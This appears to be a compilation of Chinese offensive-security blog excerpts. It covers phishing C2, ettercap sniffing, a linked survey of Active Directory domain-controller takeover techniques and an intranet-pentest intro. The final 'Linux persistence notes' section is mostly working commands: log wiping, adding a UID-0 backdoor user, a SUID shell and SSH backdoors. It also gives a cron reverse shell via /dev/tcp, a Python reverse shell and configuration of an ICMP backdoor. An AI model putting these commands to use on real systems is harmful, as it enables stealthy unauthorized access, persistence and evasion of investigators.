利用微步社区做天然白名单且免杀的远控C2（支持手机电脑） 昨天在公众号看到一篇很骚的钓鱼手法，简单的几行python爬虫就能实现，甚至连免杀的步骤都省了原文地址：https://mp.weixin.qq.com/s/4ZYnD-1rfpmRSNmfAL3rNA

中间人攻击之ettercap嗅探 某天下午，在逛公众号的时候发现这样一篇文章，这是一篇20年的老文章https://mp.weixin.qq.com/s/B9WHr4tsYZFe-VBuXPzJWg在变态中掺杂着技术，咱也不知道作者是在什么样的心境下才能写出的这篇文章文中出现了社工、wifi破解、中间人攻击、钓鱼、免杀等技术，那今天就深入学习一下ettercap这款经典工具的具体用法吧

windows域控常见打法 0x1 前言最近复习了下域的一些知识，查阅资料的时候感觉比前几年的时候多了不少，越来越透明了，然后这里顺便总结下常见拿域控的方法，都是实战中常用的，每种方法下面都贴了实战或者参考文章的链接，然后平常学习的时候，要理清楚每种漏洞的原理，漏洞需要的条件，然后在实际的环境中,结合收集到的信息,这样才能梳理出正确和清晰的攻击思路。0x2 常见拿域控的方法2.1 高可用域控漏洞通过Zerologon、Nopac、PrintNightmare漏洞一把梭，MS17-010，MS-14068运气很好的话说不定也能梭，然后就是漏洞利用的条件以及漏洞原理搞清楚，具体的漏洞利用过程网上文章超级多了。MS-14608实战文章：https://mp.weixin.qq.com/s/rS-LAAjPI-k0-n_HxlSt9wMS17-010实战文章：https://mp.weixin.qq.com/s/KzghydvJtaFyPOrNanosAgZerologon实战文章：https://mp.weixin.qq.com/s/pBwIpBx7nJ9wu9R7YJR3xgNoPac实战文章：https://mp.weixin.qq.com/s/TLloZlFt-fkxg1pGMk9aQPrintNightmare实战文章：https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg2.2 抓取凭据或注入域管理员进程查看有没有域管理员进程，没有就尝试密码喷洒或其他漏洞等方法，尽可能多横向机器，有的话注入到域管理员进程。实战文章：https://mp.weixin.qq.com/s/LrEKrSJiT5zNGahUrFWPFg抓取凭据查看没有域管理员凭据，没有就尝试密码喷洒或其他漏洞等方法，也是尽可能多横向机器。实战文章：https://mp.weixin.qq.com/s/gYiBDA14RDQUl1eka_WwIw可以借助BloodHound更直观。2.3 非约束委派主机结合打印机漏洞拿到的这台机器是被域管配置成了非约束委派的话，我们就可以委派域中任意用户去访问任意服务（例如域控的 CIFS 服务），但前提是目标用户向我们发起了 Kerberos 请求，可以使用 PrintBug 或者 PetitPotam等强制认证漏洞来完成。参考文章：https://mp.weixin.qq.com/s/MRtQG6O2eRVczZojJYCw7g实战文章：https://mp.weixin.qq.com/s/BgBMs1QNP35riA6ZsorZSA2.4 CVE-2019-1040这种一般是通过CVE-2019-1040加强制认证进行NTLM Realy，配合RBCD或ACL等来打域控或Exchange等，这一部的涉及的知识挺多的，这次也恶补了下。参考文章：https://mp.weixin.qq.com/s/bbquXVj24j3jbZNs2XZ_YAhttps://mp.weixin.qq.com/s/T55i1FqTonG1aIq9Bcj7VQhttps://mp.weixin.qq.com/s/cnQGg0S9Py7Ix6M9CAqKbg2.5 Exchange漏洞通过利用漏洞如ProxyShell、ProxyNotSell、ProxyLogon、CVE-2021-26857、PrivExchange等来获取Exchange服务器权限，获得Exchange 权限后，由于特殊组的缘故导致其拥有WriteDACL权限，可以修改域内的ACL，赋予Dcsync ACE权限给指定的用户，允许模拟域控制器，请求域内帐户的哈希值，包括域管理员的哈希值，最终获取域控制器的控制权。实战文章：https://mp.weixin.qq.com/s/Uufa1SabEU2ndJ3Lt5Boighttps://mp.weixin.qq.com/s/sjlBpVjobkSKd_Uf0J_u2Ahttps://mp.weixin.qq.com/s/O6a40449vTKWUXS4kwD9xA2.6 ADCS漏洞ADCS Relay：内网里有 ADCS 服务，且开启了证书Web注册服务的话，攻击者只需要拥有一个域账号，再结合 PetitPotam 或者 PrintBug等强制认证漏洞完成，这里就不用配合CVE-2019-1040漏洞了，因为是Relay To HTTP，然后NTLM Relay拿到 DC 的 Base64 证书，通过asktgt拿到TGT，注入TGT配合DCSYNC，从而获取域控的权限。参考文章：https://mp.weixin.qq.com/s/lzBoMZfAXVR0Dj_ogO7oPAhttps://mp.weixin.qq.com/s/0s8BptnL8eWZr5k5fM0vxA实战文章：https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSwESC系列这个看了下目前是ESC1-11了，上面提到的ASCS Relay是ESC-8，剩下的看下面参考文章吧。参考文章：https://mp.weixin.qq.com/s/aVURmXz8sTe56KBfyPutEwhttps://mp.weixin.qq.com/s/bqdI41850hUkAH89ofSMJwhttps://mp.weixin.qq.com/s/-qv0VbudiKr5QhD14b013Qhttps://mp.weixin.qq.com/s/bEoaWGp19z3P_CpolHxziACVE-2022-26923：此漏洞受Nopac利用思路的影响，将Nopac中Kerberos认证相关的问题，转向证书认证相关的问题。此漏洞通过将机器账户dNSHostName属性的值修改成与域控一样的方法，来获取域控的机器账户hash，从而获取域控的权限。参考文章：https://mp.weixin.qq.com/s/3DZPkG4Z9w8xbVKvW64Mgwhttps://mp.weixin.qq.com/s/ctpRXyhP7Zl9siAsh9Lsxw实战文章：https://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSw2.7 ACL滥用可以借助BloodHound分析ACL控制路径,发现可利用权限,比如如A用户对B用户有WriteDACL权限，就可以在A用户上修改B用户为GenericAll权限,让A用户对B用户拥有所有的访问控制权，然后也可以配合GPO滥用达到添加用户权限、添加一个本地管理员、添加一个新的计算机启动脚本等操作。ACL滥用比较经典的案例就是通过漏洞获得Exchange 权限后，由于特殊组的缘故导致其拥有WriteDACL权限，可以修改域内的ACL，赋予Dcsync ACE权限给指定的用户。参考文章：https://mp.weixin.qq.com/s/YCf-0FiqFfQ7WW0V5JR7jAhttps://mp.weixin.qq.com/s/mOVJ21KSArqsoAcV7piUxQhttps://mp.weixin.qq.com/s/XhbsSyDDV774LJ4o2QkSBw实战文章：https://mp.weixin.qq.com/s/r_bwyX2qj5VSqf3mVrnqGg2.8 Pre-Authentication&&AS-REP Roasting&&kerberoasting这几种都是针对域账户的，枚举用户或脱机爆破。参考文章：https://mp.weixin.qq.com/s/TH2BbrEj0X_1r2UkDD75vw0x3 实战文章推荐思考或尝试较多的几篇实战文章(建议细心阅读)：https://mp.weixin.qq.com/s/Iup2hZdPADFGDSi2AXP_Pghttps://mp.weixin.qq.com/s/bDH5LYjSPRtxUi1aGNpgSwhttps://mp.weixin.qq.com/s/tdPfi4y9vxvJAA2bR_VCcghttps://mp.weixin.qq.com/s/NSirkRa4w1RSjigpTsIcSwhttps://mp.weixin.qq.com/s/z_jc0_HLqeRSCtLMG8NpEghttps://mp.weixin.qq.com/s/8OueE-bEIdkvwPWu3KqrcQ0x4 总结实战环境下还是要结合收集到的信息来制定有效的攻击路线，”实战文章推荐”建议好好阅读一下，涉及了很多知识点利用，思考的过程也都体现了出来。比如，”实战文章推荐”的第一篇，基于RBCD，通过ADFind或是LDAPsearch等导出LDAP信息，查询机器账户的mS-DS-CreatorSID属性对应的SID和用户账户对应的objectSid值，进行比较发现某用户拉入域内不少机器，推测可能是运维人员，通过鱼叉钓鱼拿下此用户权限配合RBCD拿下了一台域机器权限，之后上线CS进行信息收集，发现3389有连接记录，提取之后登录某WEB服务器，发现其连接的数据库是域内唯一注册了SPN属性的MSSQL服务，之后通过RottenTomato从SERVICE提权提权到了SYSTEM，之后发现有域管进程，至此成功拿下域控。”实战文章推荐”第二篇，使用了BloodHound来对域内收集信息且收集到m.child.xiaoli的域用户PO同时处于child.xiaoli的AS组（Enterprise Admins），然后通过寻找到达子域控的最短路径，发现当前ra用户处于SN组对主机PGO有管理员权限且PGO主机存在一个名为PGO的用户Session为子域控管理员权限，所以这里直接拿下了子域控，然后在子域上通过BloodHound分析当前PGO用户，发现PGO用户处于Administrators组且拥有GetChangesALL和GetChanges Dnsync权限，所以可以直接拿下PO用户凭据(Enterprise Admins)，也就拿下了域林。文中体现了具体的思考过程，多种方法，可以去详细看看。”实战文章推荐”第六篇，从WEBDAV XXE做NTLM Realy配合RBCD，但是RBCD需要一个机器账户，所以通过把在之前的discuz数据库中的用户名整理成字典，并通过 AS_REQ返回包来判断用户名是否存在，然后将discuz的密码拿到cmd5上批量解密，解密后发现大部分用户的登录密码都是P@ssw0rd，于是使用密码喷射，成功获取到了一个域凭据，有了域凭据后连接域控ldap添加机器账户，然后通过S4U申请ST票据登录WEBDAV服务器，最后通过ssp lsass绕过卡巴dump出了域管理员hash，成功拿下域控。最后还是做好域内信息收集吧，发现的比如，通讯录、运维密码本等这类信息也收集好，有时候对拿下域控也都有关键作用。

内网渗透指南 0x00 前言什么是内网渗透：内网是一个只有组织工作人员才能访问的专用网络，简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统，通过信息收集找到网站漏洞可以顺利通过公网进入公司内部网络时，进一步对公司内部网络的渗透攻击即为内网渗透。

linux权限维持笔记 1.隐藏踪迹创建隐藏文件(ls不可见，ls -la可见)：vim .shell.php修改时间戳(文件时间)：touch -r 老文件 shell.elf文件锁定(赋予特殊权限，不允许更改)：chattr +i shell.elf无w、who、last等记录ssh：ssh -T root@IP清除last记录(登录信息)：echo '' > /var/log/wtmp端口复用：将来自IP访问80端口的流量转发到22端口iptables -t nat -A PREROUTING -p tcp -s IP --dport 80 -j REDIRECT --to-port 22ssh连接80端口ssh -p 80 root@IP历史命令记录隐藏：set +o history，停止记录history，查看记录history -d 序号，删除记录2.添加root权限用户直接添加useradd -p openssl passwd -1 -salt 'salt' 123456 hacker -o -u 0 -g root -G root -s /bin/bash -d /home/hacker修改/etc/passwd生成密码->放入passwd最后一行[root@localhost ~]# perl -le 'print crypt('123456',"addedsalt")'adrla7IBSfTZQ[root@localhost ~]# echo "hacker:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd3.suid shell让普通用户能用rootcp /bin/bash /tmp/shellchmod u+s /tmp/shell此时普通用户可以用root[ly@localhost root]$ /tmp/shell -pshell-4.2# whoamiroot4.ssh公私钥生成公私钥，回车就行(id_rsa是私钥、id_rsa.pub是公钥)ssh-keygen -t rsa查看公钥cat /root/.ssh/id_rsa.pub在对方电脑创建目录并放入公钥(注意粘贴开头可能少个s)，重启服务mkdir /root/.sshvim /root/.ssh/authorized_keyssystemctl restart sshd.service无需密码连接ssh root@IP5.ssh软连接需要PAM认证，下面UsePAM为yesvim /etc/ssh/sshd_config防火墙开放端口->重启->查看是否开放firewall-cmd --add-port=7777/tcp --permanentfirewall-cmd --reloadfirewall-cmd --query-port=7777/tcp建立软连接ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=7777免密登录ssh root@IP -p 77776.ssh wrapper先开启ssh，将原本的sshd移位systemctl start sshd.servicecd /usr/sbin/mv sshd /重写一个sshd，赋予权限echo '#!/usr/bin/perl' >sshdecho 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshdecho 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshdchmod u+x sshd免密登录socat STDIO TCP4:IP:22,sourceport=133777.计划任务写一个反弹shell脚本并赋权echo '#!/bin/bash' > /shell.shecho 'bash -i >& /dev/tcp/IP/6666 0>&1' >> /shell.shchmod +sx /etc/shell.sh添加一分钟一次的root权限计划任务echo '/1 * root /shell.sh' >> /etc/crontabsystemctl restart crond.service8.启动项添加后门路径并赋权echo '/shell.elf' >> /etc/rc.d/rc.localchmod +x /etc/rc.d/rc.local9.vim python后门vim --version，看支不支持python3反弹shell脚本，一个socket服务端，vim shell.py写入import socket, subprocess, os;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("IP", 6666));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);p = subprocess.call(["/bin/sh", "-i"]);NC监听并在对方电脑执行(可能需要等一下)vim -E -c "py3file shell.py"10.icmp后门工具https://github.com/andreafabrizi/prismvim prism.c填反弹IP、端口、时间、密码、进程名define REVERSE_HOST "192.168.1.225"define REVERSE_PORT 19832define RESPAWN_DELAY 10define ICMP_KEY "123456"define PROCESS_NAME "mysql"后台编译生成prism在对方电脑并运行gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c./prismNC监听并在自己电脑执行python2 ./sendPacket.py 对方IP 密码 自己IP 端口11.Reptile工具https://github.com/f0rb1dd3n/Reptile